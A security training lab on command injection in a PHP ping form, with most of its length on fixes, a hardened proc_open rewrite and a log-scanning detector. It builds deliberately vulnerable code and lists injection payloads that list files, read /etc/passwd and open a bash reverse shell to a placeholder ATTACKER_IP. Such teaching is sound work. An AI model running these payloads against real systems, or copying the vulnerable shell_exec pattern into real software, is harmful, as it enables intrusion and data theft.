Exercise 48: Command Injection via Input Fields

Jun 1, 2025

Objective

Learn how to exploit Command Injection vulnerabilities in web applications that execute system commands based on user input. Understand how to prevent these vulnerabilities through input validation, sanitization, and using secure APIs for system interactions.


Scenario

You are assessing a web application with a feature that allows users to check the availability of a domain by executing system commands. Due to improper input validation, attackers can inject additional commands, leading to unauthorized system access and data exposure.


Lab Setup

Prerequisites:

  • Basic knowledge of PHP and Linux commands.
  • XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
  • A code editor (e.g., VSCode, Sublime Text).

Step 1: Create the Vulnerable Web Application

  1. PHP Script with Command Injection Vulnerability
    • Create a file ping.php with the following content. It is deliberately vulnerable: the host parameter is concatenated straight into the command line that shell_exec() hands to the shell.

        <?php
        if (isset($_GET['host'])) {
            $host = $_GET['host'];
            $output = shell_exec("ping -c 1 " . $host);
            echo "<pre>$output</pre>";
        } else {
            echo "<h2>Please provide a hostname.</h2>";
        }
        ?>
        <h2>Ping a Host</h2>
        <form method="GET" action="">
            Hostname: <input type="text" name="host" required>
            <button type="submit">Ping</button>
        </form>
  2. Running the Application
    • Start the Apache server.
    • Place ping.php in the web server’s root directory (htdocs for XAMPP).
    • Open http://localhost/ping.php in your browser.

Exploitation Steps

Step 1: Injecting Malicious Commands

  1. In the Hostname field, enter the following payload: 127.0.0.1; ls
  2. Expected Result:
    • The server lists the files in the web directory.

Step 2: Accessing Sensitive Files

  1. Enter the following payload: 127.0.0.1; cat /etc/passwd
  2. Expected Result:
    • The content of the /etc/passwd file is displayed, revealing sensitive system information.

Step 3: Creating a Reverse Shell (Advanced)

  1. Enter the payload (replace ATTACKER_IP and PORT): 127.0.0.1; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
  2. Expected Result:
    • The attacker gains remote shell access to the server.

Solution and Prevention

Problem Analysis

  • The application directly executes user input in system commands without validation, allowing attackers to inject arbitrary commands.

Fixing the Vulnerability

  1. Input Validation
    • Validate the input against an allow-list of hostname characters before it reaches the command, and still quote it with escapeshellarg():

        if (preg_match('/^[a-zA-Z0-9.-]+$/D', $host)) {
            $output = shell_exec("ping -c 1 " . escapeshellarg($host));
            echo "<pre>$output</pre>";
        } else {
            echo "<h2>Invalid hostname.</h2>";
        }

      The D modifier makes $ match only at the very end of the string; without it PCRE also accepts a value with a trailing newline. Note that this character class still admits a leading hyphen, which ping reads as an option rather than a host, so a stricter label-by-label check is preferable.
  2. Avoid Using Shell Commands
    • When the feature only needs name resolution, use a built-in function such as gethostbyname() instead of a shell command:

        $ip = gethostbyname($host);
        echo "<h2>IP Address: $ip</h2>";

      gethostbyname() returns the input string unchanged when the name does not resolve, so compare the result with $host before treating it as an address, and pass it through htmlspecialchars() before echoing it, since on failure it is still user input.
  3. Use Escaping Functions
    • Apply escapeshellarg() to every user-supplied value that is passed as a single argument:

        $output = shell_exec("ping -c 1 " . escapeshellarg($host));

      escapeshellarg() wraps the value in single quotes so the shell treats it as one word. escapeshellcmd() only escapes metacharacters in a whole command string and does not prevent extra whitespace-separated arguments from being appended, so prefer escapeshellarg() for arguments.
  4. Limit Command Execution Privileges
    • Run the web server with the least privileges to minimize impact.
  5. Disable Dangerous PHP Functions
    • Disable functions like exec(), shell_exec(), and system() in php.ini (this applies to every script on that PHP installation, and the web server must be restarted for it to take effect): disable_functions = exec, shell_exec, system, passthru
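The following is an added, hardened rewrite of ping.php that combines fixes 1 to 3 above; it is example code written for this page, not the lab's own solution. It assumes PHP 7.4 or later on Linux (proc_open() only accepts an array command, which bypasses the shell entirely, from 7.4), and that ping is the iputils binary at /bin/ping with support for the -c and -W options. The hostname check is stricter than the single character class in fix 1: it validates each DNS label, bounds the length, and anchors with \A and \z so a trailing newline or a leading hyphen cannot slip through.

```php
<?php
// Hardened replacement for ping.php (added example, not the lab's own code).
// Assumes PHP >= 7.4 on Linux with iputils ping at /bin/ping.
declare(strict_types=1);

// Returns true only for a syntactically valid hostname or IPv4 address.
// Compared with preg_match('/^[a-zA-Z0-9.-]+$/', ...) this also rejects
// a trailing newline ("$" matches before one, "\z" does not), over-long
// names, empty labels such as "a..b", and labels starting with "-",
// which ping would otherwise parse as an option.
function isValidHost(string $host): bool
{
    if ($host === '' || strlen($host) > 253) {
        return false;
    }
    if (filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false) {
        return true;
    }
    // Each DNS label: 1-63 chars, alphanumeric, hyphens only in the middle.
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    return preg_match('/\A' . $label . '(?:\.' . $label . ')*\z/', $host) === 1;
}

// Runs ping without a shell: proc_open() with an array command executes the
// binary directly, so no metacharacter in $host is ever interpreted.
function pingHost(string $host): string
{
    if (!isValidHost($host)) {
        throw new InvalidArgumentException('Invalid hostname.');
    }
    // -c 1: one probe (as in the lab); -W 2: give up after two seconds.
    $cmd  = ['/bin/ping', '-c', '1', '-W', '2', $host];
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($cmd, $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('Could not start ping.');
    }
    $out = stream_get_contents($pipes[1]);
    $err = stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    $status = proc_close($proc);
    return $status === 0 ? $out : "ping failed (exit $status): $err";
}

if (isset($_GET['host'])) {
    // host[]=... would arrive as an array; treat anything but a string as invalid.
    $host = is_string($_GET['host']) ? $_GET['host'] : '';
    try {
        // Always HTML-escape command output before echoing it into the page.
        echo '<pre>' . htmlspecialchars(pingHost($host), ENT_QUOTES, 'UTF-8') . '</pre>';
    } catch (InvalidArgumentException $e) {
        http_response_code(400);
        echo '<h2>Invalid hostname.</h2>';
    }
} else {
    echo '<h2>Please provide a hostname.</h2>';
}
?>
<h2>Ping a Host</h2>
<form method="GET" action="">
    Hostname: <input type="text" name="host" required>
    <button type="submit">Ping</button>
</form>
```

Drop this file in place of the original ping.php and repeat the payloads from the exploitation steps: each one fails isValidHost() and gets a 400 response, and even a value that somehow passed validation would reach ping as a single argv entry rather than a shell command line. Fixes 4 and 5 (least privilege and disable_functions) are server configuration and remain worthwhile on top of this.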

Testing After Fix

  1. Attempt to inject 127.0.0.1; ls.
  2. Expected Result:
    • The application rejects the input or safely executes the intended command.
  3. Attempt advanced payloads like 127.0.0.1; cat /etc/passwd.
  4. Expected Result:
    • The server prevents command execution and displays an error.
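Beyond re-running the payloads by hand, it helps to confirm that attempts are visible in the web server's access log. The script below is an added example, not part of the lab: it parses Apache combined-format log lines, URL-decodes the host query parameter of requests to ping.php, and reports any value containing shell metacharacters together with the response status, so a 200 against such a request points at the unfixed version and a 400 at the fixed one. The log lines are constructed for this example and are not real traffic.

```php
<?php
// Added example (not part of the lab): flag ping.php requests whose host
// parameter carries shell metacharacters, from Apache combined-format logs.
declare(strict_types=1);

// Constructed sample log lines (not real traffic). Payloads mirror the lab's.
$sampleLog = <<<'LOG'
10.0.0.5 - - [01/Jun/2025:10:01:02 +0000] "GET /ping.php?host=example.com HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jun/2025:10:01:10 +0000] "GET /ping.php?host=127.0.0.1%3B%20ls HTTP/1.1" 200 2048 "-" "curl/8.0"
10.0.0.9 - - [01/Jun/2025:10:01:15 +0000] "GET /ping.php?host=127.0.0.1%3B%20cat%20%2Fetc%2Fpasswd HTTP/1.1" 200 4096 "-" "curl/8.0"
10.0.0.7 - - [01/Jun/2025:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 128 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jun/2025:10:02:30 +0000] "GET /ping.php?host=127.0.0.1%3B%20ls HTTP/1.1" 400 64 "-" "curl/8.0"
LOG;

// Returns one finding per suspicious request: client IP, timestamp,
// HTTP status and the decoded host value.
function findInjectionAttempts(string $log): array
{
    $findings = [];
    foreach (explode("\n", trim($log)) as $line) {
        // client, identd, user, [time], "METHOD target PROTO", status
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
            continue;
        }
        $ip     = $m[1];
        $time   = $m[2];
        $target = $m[4];
        $status = (int) $m[5];

        $query = parse_url($target, PHP_URL_QUERY);
        if (!is_string($query)) {
            continue;   // no query string at all
        }
        parse_str($query, $params);   // parse_str() also URL-decodes the values
        if (!isset($params['host']) || !is_string($params['host'])) {
            continue;
        }
        $host = $params['host'];
        // Characters a shell interprets; none of them belong in a hostname.
        if (preg_match('/[;&|`$(){}<>\n\\\\]/', $host)) {
            $findings[] = ['ip' => $ip, 'time' => $time, 'status' => $status, 'host' => $host];
        }
    }
    return $findings;
}

foreach (findInjectionAttempts($sampleLog) as $f) {
    printf("%s %s status=%d host=%s\n", $f['time'], $f['ip'], $f['status'], json_encode($f['host']));
}
```

Run it with php on a real access log by replacing $sampleLog with file_get_contents() of the log. The metacharacter class is deliberately broad; combine it with the allow-list used in the fix so that the same rule decides both what the application accepts and what the log review treats as an attempt.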

Conclusion

In this lab, you exploited Command Injection by injecting system commands through unsanitized input, gaining access to sensitive information. You also learned how to mitigate this risk by validating input, using secure functions, and restricting command execution.
